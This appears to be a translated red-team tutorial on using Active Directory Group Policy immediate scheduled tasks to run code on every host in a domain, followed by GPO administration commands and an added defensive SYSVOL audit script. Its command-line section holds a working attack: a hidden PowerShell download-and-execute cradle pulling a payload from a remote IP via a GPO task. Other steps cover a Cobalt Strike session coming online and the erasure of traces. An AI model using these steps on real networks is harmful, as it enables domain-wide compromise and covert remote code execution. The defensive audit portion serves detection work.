Premise
Have the authority to modify a particular group policy, or domain administration authority.
Achievable effect
One-time control of every host in the domain to which the specified group policy applies.
Usage ideas
Here are the original words of 3gstudent:
Depending on the situation, there are the following two ways to use this:
1. Create a new group policy and create a scheduled task in it to achieve remote execution
- Create a new GPO and link it to the corresponding domain
- Back up the GPO
- Modify Backup.xml and gpreport.xml
- Create ScheduledTasks.xml
- Restore the GPO and force the client to refresh its policy
- Clean up operation traces
Steps 2 to 5 can be implemented directly with a script.
2. Modify an existing group policy and replace its scheduled task
- If a policy on the domain controller already has a scheduled task configured
- There is no need to register a new one; just modify ScheduledTasks.xml
Implementation
Here we split this into two implementation methods: in the graphical interface and on the cmd command line.
cmd command line environment
Sometimes we do not have a graphical interface and need to do it this way. Here it is assumed that we have domain administration authority.
- Create the GPO
powershell -c new-gpo -name TestGPO1
- Link the GPO
powershell -c New-GPLink -Name TestGPO1 -Target 'dc=test,dc=com'
- Modify the GPO and add an immediate task
An immediate task is forcibly executed once when group policy is synchronized; group policy synchronizes automatically every 90 minutes.
The following commands need to be executed in PowerShell:
Set-ExecutionPolicy Bypass -Scope Process # bypass the execution policy
Import-Module C:\Users\Administrator\Desktop\1.ps1 # import the script file
Script file download address: https://github.com/3gstudent/Homework-of-Powershell/blob/master/New-GPOImmediateTask.ps1
New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO1 -SysPath '\\dc.test.com\sysvol\test.com' -CommandArguments '-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.124.138:80/a''))"' # add the immediate task
/del /q /f "{xxxxxx}" # delete the corresponding backup file
Graphical interface implementation
Open Group Policy Management: press Alt+R, type gpmc.msc into the Run box and press Enter, and you will see the following figure.
View which group policies are loaded in the current domain.
Right-click a group policy linked to the domain and click Edit:
Go to the Scheduled Tasks option.
Right-click in the blank space to create an immediate task.
Fill in the task name and switch to the Actions tab. There you can create a new action and click OK. After that you return to this page; confirm with Enter rather than the cross in the upper right corner of the page.
After the above operations are completed, you can run gpupdate /force on the client to force group policy synchronization, after which you will see the CS session come online. You can also wait 90 minutes for group policy to synchronize automatically.
Other knowledge
Trivia about GPO files
{6AC1786C-016F-11D2-945F-00C04fB984F9} corresponds to the Default Domain Controllers Policy
{31B2F340-016D-11D2-945F-00C04FB984F9} corresponds to the Default Domain Policy
The configuration file for a scheduled task in the Default Domain Policy is placed at the location shown in the figure of the original article (figure not reproduced here); the contents of that XML file look like the figure.
PowerShell function parameter passing
When we want to pass a PowerShell command as a parameter and the parameter contains a single quote ('), it must be escaped; the way to escape it is to put another single quote in front of it. When passing parameters to a PowerShell function, prefer to wrap them in single quotes: the content between the two single quotes is passed as a string rather than interpreted as a command, which reduces the chance of errors.
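The escaping rule above, shown as an added example that is not part of the original article or of 3gstudent's script. The helper name ConvertTo-SingleQuotedLiteral and the sample text are my own; the example doubles every embedded single quote, wraps the result in single quotes, and checks that PowerShell parses the literal back to the original text without expanding the $ sign.

```powershell
# Added example (not from the original post). Demonstrates how a string that may contain
# single quotes is turned into a safe single-quoted PowerShell literal.
function ConvertTo-SingleQuotedLiteral {
    param([Parameter(Mandatory)][string]$Text)
    # Double every embedded single quote, then wrap the whole thing in single quotes.
    "'" + ($Text -replace "'", "''") + "'"
}

# Constructed sample input: contains both a single quote and a $ sign.
$sample  = "it's a " + '$var, not expanded'
$literal = ConvertTo-SingleQuotedLiteral -Text $sample
# $literal now reads: 'it''s a $var, not expanded'

# Parse the literal the way PowerShell would on a command line and check the round trip.
$parsed = & ([scriptblock]::Create($literal))
if ($parsed -ne $sample) { throw 'round trip failed' }

# Contrast: the same text inside double quotes has $var expanded (to nothing here).
$var = $null
$expanded = "it's a $var, not expanded"

Write-Output "single-quoted literal : $literal"
Write-Output "round trip ok         : $($parsed -eq $sample)"
Write-Output "double-quoted version : $expanded"
```

The round trip is the useful check: if the doubled quotes were wrong, the scriptblock would either fail to parse or return a different string.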
Other common operations on GPOs
The general operations are as follows:
Load the GroupPolicy module:
Import-Module GroupPolicy -Verbose
Get the contents of all GPOs:
Get-GPO -All
Export all GPOs as an HTML report:
Get-GPOReport -All -ReportType html -Path C:\GposReport\GposReport.html
Export each GPO to an HTML report separately:
Get-GPO -All | %{ Get-GPOReport -name $_.displayname -ReportType html -path ("c:\GPOReports\"+$_.displayname+".html") }
View the permission settings of the specified GPO:
Get-GPPermission -Name "TestGPO1" -All
Link the GPO to the specified OU:
powershell -c New-GPLink -Name TestGPO1 -Target 'OU=OUTest1,dc=test,dc=com'
Back up the specified GPO:
Backup-Gpo -Name TestGPO1 -Path C:\GpoBackups
Back up all GPOs:
Backup-Gpo -All -Path "c:\GpoBackups"
Restore the specified GPO:
Restore-GPO -Name TestGPO1 -Path C:\GpoBackups
Restore all GPOs:
Restore-GPO -All -Path "c:\GpoBackups"
Create OU:
New-ADOrganizationalUnit -Name OUTest1 -Path "dc=test,dc=com"
View all computers in the current domain:
dsquery computer
This returns, for example, "CN=Computer1,CN=Computers,DC=test,DC=com". Add this computer to OU=OUTest1:
dsmove "CN=Computer1,CN=Computers,DC=test,DC=com" -newparent OU=OUTest1,dc=test,dc=com
Query the computers in OU=OUTest1:
dsquery computer OU=OUTest1,dc=test,dc=com
Create a GPO and link it:
new-gpo -name TestGPO | new-gplink -Target "OU=OUTest1,dc=test,dc=com"
Restore: remove Computer1 from OU=OUTest1:
dsmove "CN=Computer1,OU=OUTest1,DC=test,DC=com" -newparent CN=Computers,dc=test,dc=com
Delete OU=OUTest1:
set-ADOrganizationalUnit -Identity "OU=OUTest1,dc=test,dc=com" -ProtectedFromAccidentalDeletion $false
Remove-ADOrganizationalUnit -Identity "OU=OUTest1,dc=test,dc=com" -Recursive -Confirm:$False
View the modification permissions for group policy:
icacls \\test.com\sysvol\test.com\policies\*
1. F = Full Control
- equivalent to 777
2. CI = Container Inherit. This flag indicates that subordinate containers will inherit this ACE.
- Subfolders inherit the parent folder's permissions
3. OI = Object Inherit. This flag indicates that subordinate files will inherit the ACE.
- Child files inherit the parent folder's permissions
4. /T = Apply recursively to existing files and sub-folders (OI and CI only apply to new files and sub-folders).
- Recursive propagation of permissions
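An audit script for the two things this article touches on from the defender's side, the GPO folders under SYSVOL (the "Trivia about GPO files" section) and the write permissions on them (the icacls check above). This is an added example and not part of the original article or of 3gstudent's tool. It assumes a domain-joined host with the RSAT GroupPolicy module and read access to SYSVOL, uses the lab domain test.com from the article as a placeholder, and relies on the standard SYSVOL layout \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine|User\Preferences\ScheduledTasks\ScheduledTasks.xml and the Group Policy Preferences element names Task, TaskV2, ImmediateTask and ImmediateTaskV2. It lists every scheduled or immediate task deployed through a GPO, including the account it runs as and the command it launches, and flags principals other than the usual administrative ones that hold write or modify rights on a policy folder.

```powershell
# Added example, not part of the original post or of 3gstudent's tool.
# Audits SYSVOL policy folders for (1) scheduled / immediate tasks deployed through Group Policy
# Preferences and (2) unexpected principals with write or modify rights on a policy folder.
# Assumptions: RSAT GroupPolicy module present, read access to SYSVOL, 'test.com' = lab domain.
param(
    [string]$Domain = 'test.com'
)

Import-Module GroupPolicy -ErrorAction Stop

# Standard SYSVOL layout (assumed):
# \\<domain>\SYSVOL\<domain>\Policies\{GUID}\{Machine|User}\Preferences\ScheduledTasks\ScheduledTasks.xml
$policiesRoot = "\\$Domain\SYSVOL\$Domain\Policies"

# Principals that normally hold write access on a policy folder (wildcard on the domain prefix).
$expectedWriters = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'CREATOR OWNER',
    '*\Domain Admins',
    '*\Enterprise Admins'
)

$tasks     = New-Object System.Collections.Generic.List[object]
$writeAces = New-Object System.Collections.Generic.List[object]

foreach ($dir in Get-ChildItem -Path $policiesRoot -Directory) {
    $guid    = $dir.Name                                  # e.g. {31B2F340-016D-11D2-945F-00C04FB984F9}
    $display = '<no matching GPO object in AD>'           # a folder without an AD object is itself worth a look
    try {
        $display = (Get-GPO -Guid $guid.Trim('{}') -Domain $Domain -ErrorAction Stop).DisplayName
    } catch { }

    # (1) Tasks deployed through Group Policy Preferences. Each child of <ScheduledTasks> is one task
    #     (Task / TaskV2 / ImmediateTask / ImmediateTaskV2). V2 tasks carry <Exec><Command/><Arguments/></Exec>;
    #     V1 tasks keep the program in the appName/args attributes of <Properties>.
    Get-ChildItem -Path $dir.FullName -Recurse -Filter 'ScheduledTasks.xml' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xmlPath = $_.FullName
            [xml]$doc = Get-Content -Path $xmlPath -Raw
            foreach ($task in $doc.SelectNodes('/ScheduledTasks/*')) {
                $props = $task.SelectSingleNode('Properties')
                $exec  = $task.SelectSingleNode('.//Exec')
                $cmd = if ($null -ne $exec) {
                    "$($exec.Command) $($exec.Arguments)".Trim()
                } elseif ($null -ne $props) {
                    "$($props.GetAttribute('appName')) $($props.GetAttribute('args'))".Trim()
                } else { '' }
                $tasks.Add([pscustomobject]@{
                    GPO      = $display
                    Guid     = $guid
                    Scope    = if ($xmlPath -like '*\Machine\*') { 'Computer' } else { 'User' }
                    Kind     = $task.LocalName            # ImmediateTaskV2 = runs once at the next policy refresh
                    TaskName = $task.GetAttribute('name')
                    RunAs    = if ($null -ne $props) { $props.GetAttribute('runAs') } else { '' }
                    Command  = $cmd
                })
            }
        }

    # (2) Allow ACEs granting write/modify/full control to principals outside the expected set.
    foreach ($ace in (Get-Acl -Path $dir.FullName).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.FileSystemRights.ToString()
        # Generic rights show up as a bare number; treat those as potentially writable too.
        if ($rights -notmatch 'FullControl|Modify|Write' -and $rights -notmatch '^-?\d+$') { continue }
        $principal = $ace.IdentityReference.Value
        $known = $false
        foreach ($pattern in $expectedWriters) {
            if ($principal -like $pattern) { $known = $true; break }
        }
        if (-not $known) {
            $writeAces.Add([pscustomobject]@{
                GPO = $display; Guid = $guid; Principal = $principal; Rights = $rights
            })
        }
    }
}

Write-Output "Scheduled/immediate tasks found in SYSVOL ($($tasks.Count)):"
$tasks | Format-Table -AutoSize | Out-String -Width 200 | Write-Output
Write-Output "Unexpected principals with write/modify rights on policy folders ($($writeAces.Count)):"
$writeAces | Format-Table -AutoSize | Out-String -Width 200 | Write-Output
```

Run it periodically from a workstation that can read SYSVOL and compare the task list against the previous run: a new ImmediateTaskV2 entry running as SYSTEM, or a policy folder whose GUID has no matching GPO object, is exactly the trace the article's "clean up operation traces" step is meant to remove, so the diff is more telling than any single snapshot.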
Reference articles:
- Domain Penetration: Using the scheduled tasks in GPO to implement remote execution
- Windows intranet protocol learning: LDAP group policy